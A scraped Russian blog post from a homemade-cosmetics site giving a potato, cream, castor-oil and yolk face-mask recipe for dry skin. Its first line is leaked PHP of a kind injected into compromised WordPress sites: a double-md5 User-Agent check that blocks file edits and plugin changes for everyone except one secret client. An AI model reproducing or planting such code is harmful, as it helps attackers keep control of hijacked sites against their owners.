if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепты увлажнения сухой кожи — нам поможет картофель! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты увлажнения сухой кожи — нам поможет картофель!

Если кожа слегка натянута, шелушится, значит, она сухая, и она нуждается в помощи. Поможет ей правильный, дополнительный уход. При сухой коже поможет отварной картофель!

Типы кожи быва­ют раз­ны­ми. Если кожа слег­ка натя­ну­та, шелу­шит­ся, зна­чит, она сухая, и она нуж­да­ет­ся в помо­щи. Помо­жет ей пра­виль­ный, допол­ни­тель­ный уход. Её надо смяг­чить как мож­но боль­ше. Мож­но при­бег­нуть к кре­мам и все­воз­мож­ным лосьо­нам. А мож­но помочь мас­ка­ми. Рецеп­ты, кото­рых совсем простые.

При сухой коже помо­жет отвар­ной кар­то­фель. После очи­ще­ния от кожу­ры, его надо раз­мель­чить, мож­но на тёр­ке. Вос­поль­зу­ем­ся дву­мя сто­ло­вы­ми лож­ка­ми раз­мяг­чён­но­го кар­то­фе­ля. Добав­ля­ем в него слив­ки, доста­точ­но лож­ки. Слив­ки очень хоро­шо смяг­ча­ют кожу. Оба ингре­ди­ен­та надо хоро­шо пере­ме­шать, но кон­си­стен­ция не долж­на быть жидкой.

Глав­ной состав­ля­ю­щей это­го рецеп­та явля­ет­ся касто­ро­вое мас­ло. Оно помо­га­ет смяг­чить и сохра­нить эла­стич­ность кожи. К сто­ло­вой лож­ке касто­ро­во­го мас­ла, доба­вить один жел­ток, и тща­тель­но пере­ме­ши­ва­ем. Он содер­жит вита­ми­ны A, E, так необ­хо­ди­мые нашей коже. Хоро­шо пере­ме­ши­ва­ем оба ингре­ди­ен­та и выли­ва­ем к кар­тош­ке. Мас­ка почти гото­ва, толь­ко оста­лось хоро­шо пере­ме­шать и нане­сти на лицо, минуя область глаз и рта. Мас­ка про­явит своё дей­ствие – смяг­чит и напи­та­ет кожу. Остав­ля­ем её на 30–40 минут.

На вре­мя мас­ки надо вклю­чить музы­ку и рас­сла­бить­ся. После такой мас­ки, лицо спо­лас­ки­ва­ем тёп­лой водой. Для сухой кожи вес­ной хоро­шо сде­лать восемь таких про­це­дур через день. А затем мож­но делать один или два раза в месяц. Такая мас­ка хоро­шо смяг­чит устав­шую, сухую кожу.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!